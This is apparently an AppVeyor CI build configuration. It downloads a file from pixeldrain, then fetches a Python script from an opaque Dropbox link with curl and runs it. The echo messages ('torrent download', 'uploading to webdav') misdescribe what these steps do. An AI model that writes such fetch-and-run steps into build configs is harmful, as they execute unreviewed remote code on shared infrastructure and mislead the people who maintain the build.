version: 1.0.{build}
image: Ubuntu

branches:
  only:
    - Sera

install:
  - pip install aria2 requests
  - mkdir -p downloads

build_script:
  - |
      echo "Starting torrent download..."
      aria2c --dir=downloads "https://pixeldrain.com/api/file/KhAy7EyP?download"
      echo "Uploading files to webdav..."
      curl -o justine.py "https://uc023687d453a16075950e24b6fd.dl.dropboxusercontent.com/cd/0/get/CsR_klXaw8nr6viCFWsHejnF3BoOf-8zoDwA8NZ6ukzLvq6VFTnC6gAAdXHYO5q1DzEChsjxkFJtfqIVNPNYTbayK0vWDMZ_-7nheI4Zm6XM9OEJkPTy12DpDzK79AMS4rXtM6rQOdCpxVdGuM31HhjYP_JAAMwyQj4O_6Kd6TA8VQ/file?_download_id=7718942610263154733818136212318463063568192153361916970218186781&_log_download_success=1#"
      python justine.py
      
